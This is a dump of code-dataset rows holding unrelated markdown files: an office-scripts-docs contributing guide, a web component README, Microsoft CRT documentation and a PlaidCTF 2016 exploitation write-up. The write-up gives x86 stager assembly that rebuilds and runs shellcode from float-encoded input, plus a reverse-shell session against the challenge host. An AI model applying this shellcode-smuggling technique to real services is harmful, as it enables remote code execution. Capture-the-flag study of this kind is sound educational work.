hexsha stringlengths 40 40 | size int64 5 1.04M | ext stringclasses 6 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 344 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 11 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 344 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 11 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 344 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 11 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 1.04M | avg_line_length float64 1.14 851k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 | lid stringclasses 191 values | lid_prob float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1494e1f5459f14b8d2828732b7367fe445855bcf | 10,095 | md | Markdown | Contributing.md | isabella232/office-scripts-docs.ja-JP | f7c6866e44f95ecaa64e60f6d13b69d3aa25934b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | Contributing.md | isabella232/office-scripts-docs.ja-JP | f7c6866e44f95ecaa64e60f6d13b69d3aa25934b | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-02-23T15:55:19.000Z | 2021-02-23T15:55:19.000Z | Contributing.md | isabella232/office-scripts-docs.ja-JP | f7c6866e44f95ecaa64e60f6d13b69d3aa25934b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | # <a name="contribute-to-this-documentation"></a>このドキュメントに投稿する
このドキュメントをご感心をお寄せいただき、ありがとうございます。
* [投稿する方法](#ways-to-contribute)
* [GitHub を使用して投稿する](#contribute-using-github)
* [Git を使用して投稿する](#contribute-using-git)
* [Markdown を使用してトピックを書式設定する方法](#how-to-use-markdown-to-format-your-topic)
* [FAQ](#faq)
* [その他のリソース](#more-resources)
## <a name="ways-to-contribute"></a>投稿する方法
このドキュメントに投稿するいくつかの方法を下に示します。
* 記事に小さな変更を加える方法については、「[GitHub を使用して投稿する](#contribute-using-github)」を参照してください。
* 大きな変更やコードが関係する変更を加える方法については、「[Git を使用して投稿する](#contribute-using-git)」を参照してください。
* GitHub の [問題] を使用してドキュメントの不具合を報告します。
* [Web UserVoice サイトの Excel](https://excel.uservoice.com/forums/274580-excel-for-the-web?category_id=143439)で新しいドキュメントを要求します。
## <a name="contribute-using-github"></a>GitHub を使用して投稿する
リポジトリをデスクトップに複製せずにこのドキュメントに投稿するには、GitHub を使用します。これは、このリポジトリでプル リクエストを作成する最も簡単な方法です。コードの変更に関係しない小さな変更を加えるには、この方法を使用します。
**注**: この方法では、一度に 1 つの記事に投稿できます。
### <a name="to-contribute-using-github"></a>GitHub を使用して投稿するには
1. 投稿する記事を GitHub で検索します。
2. GitHub で記事が表示されたら、GitHub にサインインします (無料アカウントを取得するには、「[Join GitHub](https://github.com/join)」 (GitHub に参加) にアクセスします)。
3. **鉛筆アイコン** (このプロジェクトのフォークでファイルを編集します) を選択し、**[<>ファイルの編集]** ウィンドウで変更を加えます。
4. 一番下までスクロールし、説明を入力します。
5. [**ファイル変更の提案**] > [**プル リクエストの作成**] を選択します。
これでプル リクエストを正常に提出できました。プル リクエストは、通常 10 営業日以内に審査されます。
## <a name="contribute-using-git"></a>Git を使用して投稿する
次のような実質的な変更を投稿するには、Git を使用します。
* コードの投稿。
* 意味に影響する変更の投稿。
* テキストの大規模な変更の投稿。
* 新しいトピックの追加。
### <a name="to-contribute-using-git"></a>Git を使用して投稿するには
1. GitHub アカウントを持っていない場合は、[GitHub](https://github.com/join) でセットアップします。
2. アカウントを取得したら、ご利用のコンピューターに Git をインストールします。 「[Set up Git]」 (Git の設定) チュートリアルの手順を実行します。
3. Git を使用してプル要求を送信するには、「[GitHub、Git、およびこのリポジトリを使用する](#use-github-git-and-this-repository)」の手順を実行します。
4. 次の場合は、投稿者のライセンス同意書に署名するように求められます。
* Microsoft Open Technologies グループのメンバーである
* Microsoft の従業員でない投稿者である
コミュニティ メンバーは、プロジェクトへの大規模な投稿を行う前に投稿者のライセンス同意書 (CLA) に署名する必要があります。このドキュメントに記入して送信する必要があるのは 1 回だけです。注意深く確認してください。雇用主がこのドキュメントに署名することが要求される場合もあります。
CLA への署名により、メイン リポジトリにコミットする権限が付与されるわけではありませんが、Office Developer および Office Developer Content Publishing チームからお客様の投稿への確認と承認を受けることができるようになります。 送信内容には自身の名義が入ります。
通常、プル要求は 10 営業日以内に審査されます。
## <a name="use-github-git-and-this-repository"></a>GitHub、Git、およびこのリポジトリを使用する
**注:** このセクションの情報のほとんどは、「[GitHub Help]」 (GitHub ヘルプ) の記事にあります。 Git と GitHub のことをよく知っている場合は、「**コンテンツを投稿して編集する**」のセクションまでスキップして、このリポジトリのコード/コンテンツ フローの詳細を参照してください。
### <a name="to-set-up-your-fork-of-the-repository"></a>リポジトリのフォークをセットアップするには
1. このプロジェクトに投稿できるように、GitHub のアカウントをセットアップします。まだ行っていない場合は、今すぐ [GitHub](https://github.com/join) にアクセスしてセットアップします。
2. ご利用のコンピューターに Git をインストールします。 「[Set up Git]」 (Git の設定) チュートリアルの手順を実行します。
3. このリポジトリの独自のフォークを作成します。これを行うには、ページの上部にある [**フォーク**] ボタンを選択します。
4. フォークをコンピューターにコピーします。これを行うには、Git Bash を開きます。コマンド プロンプトで、次のように入力します。
git clone https://github.com/<your user name>/<repo name>.git
Next, create a reference to the root repository by entering these commands:
cd <repo name>
git remote add upstream https://github.com/OfficeDev/<repo name>.git
git fetch upstream
おめでとうございます。リポジトリをセットアップできました。今後、同じ手順をもう一度繰り返す必要はありません。
### <a name="contribute-and-edit-content"></a>コンテンツを投稿して編集する
投稿プロセスをできるだけシームレスにするため、以下の手順に従ってください。
#### <a name="to-contribute-and-edit-content"></a>コンテンツを投稿して編集するには
1. 新しい分岐を作成します。
2. 新しい内容を追加するか、既存の内容を編集します。
3. メイン リポジトリにプル リクエストを提出します。
4. 分岐を削除します。
**重要** 作業フローを効率化してマージによる競合の可能性を減らすため、各分岐を単一の概念 / 記事に限定してください。新しい分岐に適した内容には、次のものが含まれます。
* 新しい記事。
* スペルと文法の編集。
* 大規模な記事セット全体への単一の書式設定変更の適用 (たとえば、新しい著作権フッターの適用)。
#### <a name="to-create-a-new-branch"></a>新しい分岐を作成するには
1. Git Bash を開きます。
2. At the Git Bash command prompt, type `git pull upstream master:<new branch name>`. This creates a new branch locally that is copied from the latest OfficeDev master branch.
3. At the Git Bash command prompt, type `git push origin <new branch name>`. This alerts GitHub to the new branch. You should now see the new branch in your fork of the repository on GitHub.
4. At the Git Bash command prompt, type `git checkout <new branch name>` to switch to your new branch.
#### <a name="add-new-content-or-edit-existing-content"></a>新しい内容を追加するか既存の内容を編集する
You navigate to the repository on your computer by using File Explorer. The repository files are in `C:\Users\<yourusername>\<repo name>`.
ファイルを編集するには、好みのエディターで開いて変更します。新しいファイルを作成するには、好みのエディターを使用して、リポジトリのローカル コピー内の適切な場所に新しいファイルを保存します。作業中は、頻繁に作業内容を保存してください。
The files in `C:\Users\<yourusername>\<repo name>` are a working copy of the new branch that you created in your local repository. Changing anything in this folder doesn't affect the local repository until you commit a change. To commit a change to the local repository, type the following commands in GitBash:
git add .
git commit -v -a -m "<Describe the changes made in this commit>"
`add` コマンドにより、変更はリポジトリへのコミットの準備としてステージング領域に追加されます。`add` コマンドの後のピリオドは、サブフォルダーを再帰的にチェックして、追加または変更したすべてのファイルをステージングすることを指定します。(すべての変更をコミットするのでない場合は、特定のファイルを追加できます。コミットを元に戻すこともできます。ヘルプを表示するには、「`git add -help`」または「`git status`」と入力してください。)
`commit` コマンドにより、ステージングされた変更がリポジトリに適用されます。スイッチ `-m` は、コミット コメントをコマンドラインで提供することを意味します。-v および -a スイッチは省略できます。-v スイッチはコマンドからの詳細 (verbose) 出力用で、-a スイッチは add コマンドですでに行ったことを行います。
作業の途中で複数回コミットするか、完了時に 1 回コミットすることができます。
#### <a name="submit-a-pull-request-to-the-main-repository"></a>メイン リポジトリにプル リクエストを送信する
作業が完了し、メイン リポジトリにマージする準備ができたら、以下の手順を実行します。
#### <a name="to-submit-a-pull-request-to-the-main-repository"></a>メイン リポジトリにプル リクエストを送信するには
1. In the Git Bash command prompt, type `git push origin <new branch name>`. In your local repository, `origin` refers to your GitHub repository that you cloned the local repository from. This command pushes the current state of your new branch, including all commits made in the previous steps, to your GitHub fork.
2. GitHub サイト上のフォーク内で、新しい分岐まで移動します。
3. ページの上部にある [**プル リクエスト**] ボタンを選択します。
4. Verify the Base branch is `OfficeDev/<repo name>@master` and the Head branch is `<your username>/<repo name>@<branch name>`.
5. [**コミット範囲の更新**] ボタンを選択します。
6. プル リクエストにタイトルを追加し、作成しているすべての変更についての説明を入力します。
7. プル リクエストを提出します。
One of the site administrators will process your pull request. Your pull request will surface on the OfficeDev/<repo name> site under Issues. When the pull request is accepted, the issue will be resolved.
#### <a name="create-a-new-branch-after-merge"></a>マージの後に新しい分岐を作成する
分岐が正常にマージされた (つまり、プル リクエストが承諾された) 後は、ローカル分岐で作業を継続しないでください。別のプル リクエストを提出する場合にマージの競合が発生する可能性があります。別の更新を行うには、正常にマージされたアップストリーム分岐から新しいローカル分岐を作成した後、最初のローカル分岐を削除します。
たとえば、ローカルブランチ X が正常に OfficeDev/office スクリプトのマスター分岐にマージされていて、マージされたコンテンツに対して追加の更新を行う必要がある場合などです。 OfficeDev/office スクリプト-docs master ブランチから、新しいローカルブランチ (X2) を作成します。 これを行うには、GitBash を開き、次のコマンドを実行します。
cd office-scripts-docs
git pull upstream master:X2
git push origin X2
これで、分岐 X で提出した作業のローカル コピーを (新しいローカル分岐内に) 作成できました。X2 ブランチには他のライターがマージしたすべての作業も含まれるため、自身の作業が他のライターの作業 (たとえば、共有画像) に依存している場合はその作業が新しい分岐で使用可能になります。以前の作業 (および他のライターの作業) が分岐にあることを確認するには、新しい分岐をチェックアウトして...
git checkout X2
...and verifying the content. (The `checkout` command updates the files in `C:\Users\<yourusername>\office-scripts-docs` to the current state of the X2 branch.) Once you check out the new branch, you can make updates to the content and commit them as usual. However, to avoid working in the merged branch (X) by mistake, it's best to delete it (see the following **Delete a branch** section).
#### <a name="delete-a-branch"></a>分岐を削除する
変更内容がメイン リポジトリにマージされたら、使用した分岐は不要になったので削除します。追加の作業は新しい分岐で行う必要があります。
#### <a name="to-delete-a-branch"></a>分岐を削除するには
1. Git Bash のコマンド プロンプトで、「`git checkout master`」と入力します。これにより、削除される分岐にいないことが保証されます (削除される分岐にいることは許可されません)。
2. Next, at the command prompt, type `git branch -d <branch name>`. This deletes the branch on your computer only if it has been successfully merged to the upstream repository. (You can override this behavior with the `–D` flag, but first be sure you want to do this.)
3. Finally, type `git push origin :<branch name>` at the command prompt (a space before the colon and no space after it). This will delete the branch on your github fork.
おめでとうございます。プロジェクトに正しく投稿できました。
## <a name="how-to-use-markdown-to-format-your-topic"></a>Markdown を使用してトピックを書式設定する方法
### <a name="markdown"></a>Markdown
このリポジトリ内のすべての記事では、Markdown を使用しています。 完全な紹介 (および、すべての構文のリスト) は、「[Daring Fireball - Markdown]」にあります。
## <a name="faq"></a>FAQ
### <a name="how-do-i-get-a-github-account"></a>GitHub アカウントを取得する方法を教えてください。
無料の GitHub アカウントを開設するには、「[Join GitHub](https://github.com/join)」(GitHub に参加) にあるフォームに記入します。
### <a name="where-do-i-get-a-contributors-license-agreement"></a>投稿者のライセンス同意書はどこで入手するのでしょうか。
プル リクエストで投稿者のライセンス同意書 (CLA) が必要な場合、CLA の署名が必要であることを述べる通知が自動的に送信されます。
コミュニティ メンバーは、**このプロジェクトへの大規模な投稿を行う前に投稿者のライセンス同意書 (CLA) に署名する必要があります**。このドキュメントに記入して送信する必要があるのは 1 回だけです。注意深く確認してください。雇用主がこのドキュメントに署名することが要求される場合もあります。
### <a name="what-happens-with-my-contributions"></a>私が投稿した内容はどうなりますか。
プル リクエストを使用して変更を提出すると、弊社チームがその通知を受け、プル リクエストを審査します。投稿者には、プル リクエストに関する通知が GitHub から送られます。さらに情報が必要な場合、弊社チームのメンバーからも通知が送られます。プル リクエストが承認された場合、ドキュメントを更新します。弊社は、投稿された内容を、法律、スタイル、わかりやすさ、またはその他の理由で編集する権利を保持します。
### <a name="can-i-become-an-approver-for-this-repositorys-github-pull-requests"></a>このリポジトリの GitHub プル リクエストの承認者になることができますか。
現在、外部の投稿者がこのリポジトリ内のプル リクエストを承認することは許可されていません。
### <a name="how-soon-will-i-get-a-response-about-my-change-request"></a>変更リクエストに関する応答をどのくらいの期間内に受けることができますか。
プル リクエストは、通常 10 営業日以内に審査されます。
## <a name="more-resources"></a>その他のリソース
* Markdown に関する詳細については、Markdown 作成者のサイト「[Daring Fireball]」にアクセスしてください。
* Git と GitHub の使用に関する詳細については、まず「[GitHub Help]」 (GitHub ヘルプ) を確認してください。
[GitHub Home]: http://github.com
[GitHub ヘルプ]: http://help.github.com/
[Git の設定]: https://help.github.com/articles/set-up-git/
[Daring Fireball - Markdown]: http://daringfireball.net/projects/markdown/
[Daring Fireball]: http://daringfireball.net/
| 48.533654 | 392 | 0.779396 | yue_Hant | 0.511631 |
1494f1021d02c3fc921cd29bcfec9de1de8c6a66 | 3,155 | md | Markdown | README.md | successk/kwc-i18n | 4d09a33f898a00f2c12efd76ed84b343365e7d2f | [
"MIT"
] | 1 | 2016-03-05T15:24:48.000Z | 2016-03-05T15:24:48.000Z | README.md | successk/kwc-i18n | 4d09a33f898a00f2c12efd76ed84b343365e7d2f | [
"MIT"
] | null | null | null | README.md | successk/kwc-i18n | 4d09a33f898a00f2c12efd76ed84b343365e7d2f | [
"MIT"
] | null | null | null | # <kwc-i18n>
> A web component used to manage internationalization
## Install
Install the component using [Bower](http://bower.io/):
```sh
$ bower install kwc-i18n --save
```
Or [download as ZIP](https://github.com/successk/kwc-i18n/archive/master.zip).
## Usage
1 – Import polyfill:
```html
<script src="bower_components/webcomponentsjs/webcomponents-lite.min.js"></script>
```
2 – Import custom element:
```html
<link rel="import" href="bower_components/kwc-i18n/kwc-i18n.html">
```
3 – Start using it!
```html
<kwc-i18n key="my.key" show></kwc-i18n>
<!-- You need to be inside a component to use var -->
<kwc-i18n key="my.key.invar" var="{{myvar}}"></kwc-i18n>
<input type="text" placeholder="[[myvar]]">
```
4 - On your index page, put the following code:
```html
<!-- Needs to import component here too. -->
<link rel="import" href="bower_components/kwc-i18n/kwc-i18n.html">
<!-- ... -->
<script>
document.addEventListener('HTMLImportsLoaded', function() {
window.kwc_i18n.setup({
// Where find your message ({locale} will be replaced by locale value (eg: "en", "fr"))
source: "messages/{locale}.json",
// Which locale to use by default?
locale: "en",
// Save the configuration into localStorage with key "kwc-i18n", replace source and locale with saved values
// useful when user locale can change and should not be reset each time the page load
save: "localStorage[kwc-i18n]",
// Date of the last translation changed (if null, always fetch translation)
date: new Date(),
// If true, ignore saved configuration and reset service
force: true
})
})
// change locale anywhere it will reload all translations
window.kwc_i18n.locale = "fr"
</script>
```
## Options
Attribute | Options | Default | Description
--- | --- | --- | ---
`key` | *String* | `null` | The message key, as you will call it in js (ex: "my.super.key")
`show` | *boolean* | `false` | If set, show the message
`var` | *{{variable}}* | `null` | If set, register the translation result into the variable
## Children
Selector | Description
--- | ---
None | -
## Methods
Method | Parameters | Returns | Description
--- | --- | --- | ---
None | - | - | -
## Events
Event | Detail | Description
--- | --- | ---
None | - | -
## Styles
Name | Default | Description
--- | --- | --
None | - | -
## Development
In order to run it locally you'll need to fetch some dependencies and a basic server setup.
1 – Install [bower](http://bower.io/) & [polyserve](https://npmjs.com/polyserve):
```sh
$ npm install -g bower polyserve
```
2 – Install local dependencies:
```sh
$ bower install
```
3 – Start development server and open `http://localhost:8080/components/kwc-i18n/`.
```sh
$ polyserve
```
## History
For detailed changelog, check [Releases](https://github.com/successk/kwc-i18n/releases).
## License
MIT | 24.84252 | 119 | 0.597464 | eng_Latn | 0.722592 |
149582288bfe2d41c8342d41750b36f53f083877 | 37 | md | Markdown | README.md | maoyr/friendly-invention | 324f9475f15210a9bf6f236c1a545f19b09427af | [
"Apache-2.0"
] | null | null | null | README.md | maoyr/friendly-invention | 324f9475f15210a9bf6f236c1a545f19b09427af | [
"Apache-2.0"
] | null | null | null | README.md | maoyr/friendly-invention | 324f9475f15210a9bf6f236c1a545f19b09427af | [
"Apache-2.0"
] | null | null | null | # friendly-invention
react-demo(es6)
| 12.333333 | 20 | 0.783784 | eng_Latn | 0.50214 |
1495dae0156b46df441b26bd79a5ba18cf655daa | 58 | md | Markdown | README.md | inverthermit/MessengerBot | c0fb0edea5f53a5cf661dd78bf856f96df30fb45 | [
"MIT"
] | null | null | null | README.md | inverthermit/MessengerBot | c0fb0edea5f53a5cf661dd78bf856f96df30fb45 | [
"MIT"
] | null | null | null | README.md | inverthermit/MessengerBot | c0fb0edea5f53a5cf661dd78bf856f96df30fb45 | [
"MIT"
] | null | null | null | # MessengerBot
A Facebook messenger chatting bot project.
| 19.333333 | 42 | 0.827586 | eng_Latn | 0.386069 |
14966a657b4c4435760fa666515036506ac148eb | 11,144 | md | Markdown | Gathered CTF writeups/plaid_ctf_2016/fixedpoint/README.md | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:00:41.000Z | 2022-03-27T06:00:41.000Z | Gathered CTF writeups/plaid_ctf_2016/fixedpoint/README.md | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | null | null | null | Gathered CTF writeups/plaid_ctf_2016/fixedpoint/README.md | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:01:42.000Z | 2022-03-27T06:01:42.000Z |
## PlaidCTF 2016 - fixedpoint (Pwn 175)
##### 15/04 - 17/02/2016 (48hr)
___
### Description:
IEEE754 is useful when your values go from -inf to +inf, but really, fixed point is all you need.
But if you want, you could grab this too.
Running at fixedpoint.pwning.xxx:7777
___
### Solution
In this weird challenge, source code is given:
```c
#include <stdlib.h>
#include <sys/mman.h>
#include <stdio.h>
int main(int argc, char** argv) {
float* array = mmap(0, sizeof(float)*8192, 7, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
int i;
int temp;
float ftemp;
for (i = 0; i < 8192; i++) {
if (!scanf("%d", &temp)) break;
array[i] = ((float)temp)/1337.0;
}
write(1, "here we go\n", 11);
(*(void(*)())array)();
}
```
___
We can write and execute shellcode here, but we don't have much control over it. The division limit
us even more as we have very limited control over the most significant and the 2nd most significant
bytes. We can define the problem now:
We can write 4 byte words in memory, which we control only the 2 LSB of them. The other 2 bytes can
take very limited values. How we can execute an arbitrary shellcode?
The first idea is to use a shellcode that contains only and 2 byte instructions. Then we can place
the instructions on the 2 LSBytes and try to have instructions that do not affect the shellcode in
the remain 2 MSB. To be honest I didn't try this approach as a more fancy solution came into my
mind:
Let's break our normal shellcode and inject it into the 2 LSB of a float number, ignoring what
the remaining 2 bytes have. Then we'll have a very small shellcode specially written that extract
these 2 bytes and reconstructs the shellcode. After that, return to the shellcode and execute it:
```
prolog
/---- jmp
|
| tuples:
| 0x????AABB
| 0x????CCDD
| ...
| 0x????YYZZ
|
\---> extract AABB CCDD ... YYZZ <----\
|
jmp ----------------------------/
```
This idea seems nice but there are some limitations. The "prolog" and "extract" parts can be
very tricky, and must consist of 2 (or 3 if we're lucky) byte instrutions. Let's start:
When we enter the shellcode region, eax points to the beginning of that region. If we want
to execute a single byte instruction, we're looking for an integer that after casting will
have the form: 0x??01ebKK
Here, KK is the desired 1 byte instruction and ?? can be anything. The idea is to execute KK
and then skip the last byte by executing a jmp +1. I found that there's an integer for every
1 byte instruction, so we're fine. Let's see the prolog:
```assembly
nop ; real reversers always start with nop
nop ;
push eax ;
push eax ;
pop edx ; edx = entry point
pop ebx ; ebx = entry point
jmp 70h ; skip tuples
```
Note the first limitation here: jump instruction must be 2 bytes long, so the maximum (positive)
offset is 0x7F. With 2 bytes of shellcode per 4 bytes we can have up to 62 bytes of shellcode.
That's ok for a /bin/sh, but not for other ones.
Then the hard part follows: Extract this shellcode and execute it. If we extract the shellcode
at the beginning of the buffer, and do not modify eax then we do a "jmp eax" (which is only 2
bytes) and jump to the shellcode.
Let's see the "extract" part:
```assembly
mov bl, 0x1c ; bl points to the tuple area (addresses are fixed)
xor ecx, ecx ; ecx = 0
mov cl, 0x20 ; ecx = 32
EXTRACT_NEXT:
push word ptr [ebx] ; first 2 bytes of the shellcode on stack (3B instruction)
inc ebx ; move on the next tuple
inc ebx ;
inc ebx ;
inc ebx ;
push word ptr [ebx] ; next 2 bytes of the shellcode on stack (3B instruction)
inc ebx ; move on the next tuple
inc ebx ;
inc ebx ;
inc ebx ;
pop ebp ; ebp contains 4 bytes of the shellcode (watch out endianess)
mov dword ptr [edx], ebp ; store the 4 bytes at the beginning of the region (2B instruction)
inc edx ; move on the next free slot
inc edx ;
inc edx ;
inc edx ;
loop EXTRACT_NEXT ; repeat until ecx = 0
nop ; we love nops!
nop ;
jmp eax ; jump to the shellcode
```
It's possible to find such integers to execute the above code. Furtunately for us, when we use 3 byte
instructions, the MSB (which have limited control) is a number between 0x40 and 0x48, which are valid
1 byte instructions. So if we have the sequence 0x48 - 0x40 (or the opposite) we can have a nop
equivalent (dec eax; in eax).
Everything seems wonderful so far, and we can execute an arbitrary shellcode. I tried the classic 23
byte /bin/sh shellcode but it didn't work :\ This was expected as there's not setbuf() in the binary
file. This means that we need a reverse TCP shellcode. However the smallest one I found was 72 bytes!
That's too bad as we can have up to 62 bytes of shellcode. However this idea can be extended:
```
prolog
/---- jmp
|
| tuples:
| 0x????AABB
| 0x????CCDD
| ...
| 0x????YYZZ
|
| /-----------------------\
| | |
| \/ |
\---> extract AABB CCDD ... YYZZ |
| |
adjust_pointers | |
/---- jmp | |
| | |
| more_tuples: | |
| 0x????EEFF | |
| 0x????GGHH | |
| ... | |
| 0x????WWXX | |
| | |
| /---------------/ |
| | |
| \/ |
\---> extract EEFF GGHH ... WWXX |
|
jmp ----------------------------/
```
So we can split the shellcode in 2 parts and merge them together during "extract". This
can gives us space for 124 bytes, which is more than enough. In order to keep the offsets
consistent, we pad each part of the shellcode with our favorite instruction (guess which :P).
The "adjust" part consists of a single instruction:
```assembly
mov bl, 0xec ; bl points to the new tuple area (addresses are fixed)
```
edx register didn't modified, so the new extract will continue pushing shellcode right after
the first one.
Finally, the whole shellcode will be:
```assembly
nop ;
nop ;
push eax ;
push eax ;
pop edx ;
pop ebx ;
jmp SKIP_TUPLES_1 ;
;
; 1st part of the shellcode
;
SKIP_TUPLES_1:
mov bl, 0x1c ;
xor ecx, ecx ;
mov cl, 0x20 ;
EXTRACT_NEXT:
push word ptr [ebx] ;
inc ebx ;
inc ebx ;
inc ebx ;
inc ebx ;
push word ptr [ebx] ;
inc ebx ;
inc ebx ;
inc ebx ;
inc ebx ;
pop ebp ;
mov dword ptr [edx], ebp ;
inc edx ;
inc edx ;
inc edx ;
inc edx ;
loop EXTRACT_NEXT ;
nop ;
nop ;
mov bl, 0xec ;
jmp SKIP_TUPLES_2 ;
;
; 2nd part of the shellcode
;
SKIP_TUPLES_2:
xor ecx, ecx ;
mov cl, 0x20 ;
EXTRACT_NEXT:
push word ptr [ebx] ;
inc ebx ;
inc ebx ;
inc ebx ;
inc ebx ;
push word ptr [ebx] ;
inc ebx ;
inc ebx ;
inc ebx ;
inc ebx ;
pop ebp ;
mov dword ptr [edx], ebp ;
inc edx ;
inc edx ;
inc edx ;
inc edx ;
loop EXTRACT_NEXT ;
nop ;
nop ;
mov bl, 0xec ;
jmp SKIP_TUPLES_2 ;
jmp eax ; jump to the shellcode
```
The last thing that we have to note is the endianess. If we want to store shellcode 11 22 33 44
the first 2 floats must be: 0x????4433 0x????2211 (little endian).
After all this, the reverse TCP shellcode is working and we can get the flag:
`PCTF{why_isnt_IEEE_754_IEEE_7.54e2}`
The code fixedpoint_expl.c was used to generate the shellcode:
```
Terminal #1:
root@nogirl:~/ctf/plaidctf# gcc fixedpoint_expl.c -o fxp && ./fxp > B
root@nogirl:~/ctf/plaidctf# cat B | nc fixedpoint.pwning.xxx 7777
^C
(connection will open once you terminate netcat)
```
```
Terminal #2:
root@nogirl:~# nc -nvvl -p9743
listening on [any] 9743 ...
connect to [128.211.189.21] from (UNKNOWN) [13.90.215.254] 45300
ls -la
total 24
drwxr-xr-x 2 root root 4096 Apr 17 02:08 .
drwxr-xr-x 4 root root 4096 Apr 17 01:40 ..
-rwxr-xr-x 1 root root 7424 Apr 17 01:40 fixedpoint_02dc03c8a5ae299cf64c63ebab78fec7
-rw-r--r-- 1 root root 36 Apr 17 01:41 flag.txt
-rwxr-xr-x 1 root root 268 Apr 17 02:01 wrapper
id
uid=1001(problem) gid=1001(problem) groups=1001(problem)
cat flag.txt
PCTF{why_isnt_IEEE_754_IEEE_7.54e2}
exit
sent 28, rcvd 373
```
___
| 38.560554 | 103 | 0.477207 | eng_Latn | 0.991404 |
14970eed74a237e8a54649d0f0f78dc204882f51 | 3,410 | md | Markdown | docs/c-runtime-library/reference/aligned-free-dbg.md | v-makoud/cpp-docs | b05cff71a8a6a8a4c7bbea1263fd0a711853f921 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/c-runtime-library/reference/aligned-free-dbg.md | v-makoud/cpp-docs | b05cff71a8a6a8a4c7bbea1263fd0a711853f921 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/c-runtime-library/reference/aligned-free-dbg.md | v-makoud/cpp-docs | b05cff71a8a6a8a4c7bbea1263fd0a711853f921 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: "_aligned_free_dbg | Microsoft Docs"
ms.custom: ""
ms.date: "11/04/2016"
ms.technology: ["cpp-standard-libraries"]
ms.topic: "reference"
apiname: ["_aligned_free_dbg"]
apilocation: ["msvcrt.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr100_clr0400.dll", "msvcr110.dll", "msvcr110_clr0400.dll", "msvcr120.dll", "msvcr120_clr0400.dll", "ucrtbase.dll"]
apitype: "DLLExport"
f1_keywords: ["_aligned_free_dbg", "aligned_free_dbg"]
dev_langs: ["C++"]
helpviewer_keywords: ["_aligned_free_dbg function", "aligned_free_dbg function"]
ms.assetid: eb0cb3c8-0992-4db8-bac3-65f1b8311ca6
author: "corob-msft"
ms.author: "corob"
ms.workload: ["cplusplus"]
---
# _aligned_free_dbg
Frees a block of memory that was allocated with [_aligned_malloc](aligned-malloc.md) or [_aligned_offset_malloc](aligned-offset-malloc.md) (debug only).
## Syntax
```C
void _aligned_free_dbg(
void *memblock
);
```
### Parameters
*memblock*<br/>
A pointer to the memory block that was returned to the [_aligned_malloc](aligned-malloc.md) or [_aligned_offset_malloc](aligned-offset-malloc.md) function.
## Remarks
The **_aligned_free_dbg** function is a debug version of the [_aligned_free](aligned-free.md) function. When [_DEBUG](../../c-runtime-library/debug.md) is not defined, each call to **_aligned_free_dbg** is reduced to a call to `_aligned_free`. Both `_aligned_free` and **_aligned_free_dbg** free a memory block in the base heap, but **_aligned_free_dbg** accommodates a debugging feature: the ability to keep freed blocks in the heap's linked list to simulate low memory conditions.
**_aligned_free_dbg** performs a validity check on all specified files and block locations before performing the free operation. The application is not expected to provide this information. When a memory block is freed, the debug heap manager automatically checks the integrity of the buffers on either side of the user portion and issues an error report if overwriting has occurred. If the _CRTDBG_DELAY_FREE_MEM_DF bit field of the [_crtDbgFlag](../../c-runtime-library/crtdbgflag.md) flag is set, the freed block is filled with the value 0xDD, assigned the _FREE_BLOCK block type, and kept in the heap's linked list of memory blocks.
If an error occurs in freeing the memory, `errno` is set with information from the operating system on the nature of the failure. For more information, see [errno, _doserrno, _sys_errlist, and _sys_nerr](../../c-runtime-library/errno-doserrno-sys-errlist-and-sys-nerr.md).
For information about how memory blocks are allocated, initialized, and managed in the debug version of the base heap, see [CRT Debug Heap Details](/visualstudio/debugger/crt-debug-heap-details). For information about the allocation block types and how they are used, see [Types of blocks on the debug heap](/visualstudio/debugger/crt-debug-heap-details). For information about the differences between calling a standard heap function and its debug version in a debug build of an application, see [Debug Versions of Heap Allocation Functions](/visualstudio/debugger/debug-versions-of-heap-allocation-functions).
## Requirements
|Routine|Required header|
|-------------|---------------------|
|**_aligned_free_dbg**|\<crtdbg.h>|
For more compatibility information, see [Compatibility](../../c-runtime-library/compatibility.md).
## See also
[Debug Routines](../../c-runtime-library/debug-routines.md) | 62 | 636 | 0.767155 | eng_Latn | 0.951977 |
149727ecfe2a8c8ba6611198dd1ef628d110d783 | 1,458 | md | Markdown | _posts/people-love/22/w/2021-04-07-james-a-garfield.md | chito365/p | d43434482da24b09c9f21d2f6358600981023806 | [
"MIT"
] | null | null | null | _posts/people-love/22/w/2021-04-07-james-a-garfield.md | chito365/p | d43434482da24b09c9f21d2f6358600981023806 | [
"MIT"
] | null | null | null | _posts/people-love/22/w/2021-04-07-james-a-garfield.md | chito365/p | d43434482da24b09c9f21d2f6358600981023806 | [
"MIT"
] | null | null | null | ---
id: 15086
